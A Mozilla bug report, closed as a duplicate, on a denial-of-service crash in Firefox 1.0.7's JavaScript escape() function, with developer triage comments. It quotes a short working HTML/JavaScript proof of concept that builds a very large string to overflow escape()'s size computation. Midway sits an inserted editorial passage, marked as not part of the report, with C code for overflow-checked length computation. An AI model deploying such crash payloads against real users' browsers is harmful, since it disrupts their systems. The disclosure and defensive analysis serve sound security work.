Closed Bug 312102 Opened 19 years ago Closed 19 years ago

Working Denial of service exploit crashes Firefox 1.07

Categories

(Core :: JavaScript Engine, defect)

1.7 Branch
defect
Not set
critical

Tracking


RESOLVED DUPLICATE of bug 303213

People

(Reporter: jp.senior, Unassigned)

References


Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7

See the following:
http://www.triviasecurity.net/exploits/Mozilla_Firefox_%3C=_1.0.7_Integar_Overflow_Denial_of_Service_Exploit

Contains the source:
<html>
        Copyright Georgi Guninski
        <br>
        Cannot be used in vulnerability databases
        <br>
        Especially securityfocus/mitre/cve/cert
        <script>
        var s=String.fromCharCode(257);
        var ki="";
        var me="";
        for(i=0;i<1024;i++)
        {ki=ki+s;}
        for(i=0;i<1024;i++)
        {me=me+ki;}
        var ov=s;
        for(i=0;i<28;i++) ov += ov;
        for(i=0;i<88;i++) ov += me;

        alert("done generating");
        var fuckbill=escape(ov);
        alert("done escape");
        alert(fuckbill);
        </script>
</html>

Reproducible: Always

Steps to Reproduce:

Actual Results:  
Firefox immediately locked up
I had other people test this on various OS's.  This is confirmed to work.
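Added editorial example, not part of the bug report and not Mozilla's own code: the script above builds a string of 2^28 + 88*2^20 = 360,710,144 UTF-16 code units of U+0101, and escape() expands each one to the six bytes "%u0101", so a 32-bit "6 bytes per code unit" size computation exceeds 2^31 and, for somewhat larger inputs, wraps to a bound smaller than the input. The C below uses a simplified escape() model with assumed names (escape_checked, escape_len_checked, escape_bound_overflows) and shows the naive 32-bit bound next to an overflow-checked length computation that refuses the input instead of allocating an undersized buffer.

```c
/* Added example: overflow-checked length computation for an escape()-style
 * expansion. Simplified model with assumed names, not SpiderMonkey's code. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Size of the string the bug's script builds: ov doubles 28 times (2^28 code
 * units) and then appends me (1024*1024 code units) 88 times. */
#define SCRIPT_STRING_LEN ((1u << 28) + 88u * (1u << 20))

/* Characters JavaScript's escape() copies through unchanged. */
static bool escape_passthrough(uint16_t c) {
    if ((c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') || (c >= '0' && c <= '9'))
        return true;
    return c == '@' || c == '*' || c == '_' || c == '+' || c == '-' || c == '.' || c == '/';
}

/* Bytes escape() emits for one UTF-16 code unit: 1, "%XX" (3) or "%uXXXX" (6). */
static size_t escaped_width(uint16_t c) {
    return escape_passthrough(c) ? 1 : (c < 0x100 ? 3 : 6);
}

/* Naive 32-bit upper bound "6 bytes per code unit". The product wraps modulo
 * 2^32, so a large input yields a bound smaller than the input itself. */
uint32_t naive_escape_bound32(uint32_t n) {
    return n * 6u;
}

/* Overflow-checked arithmetic on size_t; false means the true result does not fit. */
static bool checked_add(size_t a, size_t b, size_t *out) {
    if (a > SIZE_MAX - b) return false;
    *out = a + b;
    return true;
}
static bool checked_mul(size_t a, size_t b, size_t *out) {
    if (b != 0 && a > SIZE_MAX / b) return false;
    *out = a * b;
    return true;
}

/* True when the worst-case bound n*6 cannot be represented in size_t. */
bool escape_bound_overflows(size_t n) {
    size_t bound;
    return !checked_mul(n, 6, &bound);
}

/* Exact escaped length, accumulated with checked addition. */
bool escape_len_checked(const uint16_t *s, size_t n, size_t *out) {
    size_t len = 0;
    for (size_t i = 0; i < n; i++)
        if (!checked_add(len, escaped_width(s[i]), &len)) return false;
    *out = len;
    return true;
}

/* Hardened escape(): size first, refuse on overflow, then write into a buffer
 * that is exactly the computed size plus the terminator. Caller frees. */
char *escape_checked(const uint16_t *s, size_t n) {
    size_t len, total;
    if (!escape_len_checked(s, n, &len) || !checked_add(len, 1, &total)) return NULL;
    char *out = malloc(total);
    if (out == NULL) return NULL;
    char *p = out;
    for (size_t i = 0; i < n; i++) {
        uint16_t c = s[i];
        if (escape_passthrough(c))  *p++ = (char)c;
        else if (c < 0x100)         p += sprintf(p, "%%%02X", (unsigned)c);
        else                        p += sprintf(p, "%%u%04X", (unsigned)c);
    }
    *p = '\0';
    return out;
}

/* Constructed sample: 'a', space, U+0101 (the code unit the script repeats), '%'. */
const uint16_t SAMPLE[] = { 'a', ' ', 0x0101, '%' };
const size_t SAMPLE_LEN = sizeof SAMPLE / sizeof SAMPLE[0];

int main(void) {
    printf("script string: %u code units, naive 32-bit bound: %u\n",
           SCRIPT_STRING_LEN, naive_escape_bound32(SCRIPT_STRING_LEN));
    printf("0x30000000 code units: naive bound wraps to 0x%x\n",
           naive_escape_bound32(0x30000000u));
    char *e = escape_checked(SAMPLE, SAMPLE_LEN);
    printf("escape(sample) = %s\n", e ? e : "(overflow)");
    free(e);
    return 0;
}
```

The length pass and the write pass use the same per-character width function, so the buffer is never smaller than what gets written; on overflow the caller gets NULL (an out-of-memory error at the JavaScript level) rather than a heap write past the allocation.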
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20051010
Firefox/1.6a1

I don't see a crash or hang, but Firefox says "Out of memory" in the JavaScript
console during the escape() step.  I never see the "done escape" message.  I
think "Out of memory" is bogus in this case, btw.
Same with Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12)
Gecko/20050914 Firefox/1.0.7.
With Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051007
Firefox/1.6a1, I get "out of memory" before it even gets to the "done
generating" message.
> I think "Out of memory" is bogus in this case, btw.

Never mind.  After re-reading the script I see that it is generating a
ridiculously long string.
Assignee: nobody → general
Component: Security → JavaScript Engine
Product: Firefox → Core
QA Contact: firefox → general
Version: unspecified → 1.7 Branch
(In reply to comment #1)
> I had other people test this on various OS's.  This is confirmed to work.

Define "work" -- we think we fixed this in 1.0.7

see bug 303213 and bug 305190

*** This bug has been marked as a duplicate of 303213 ***
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE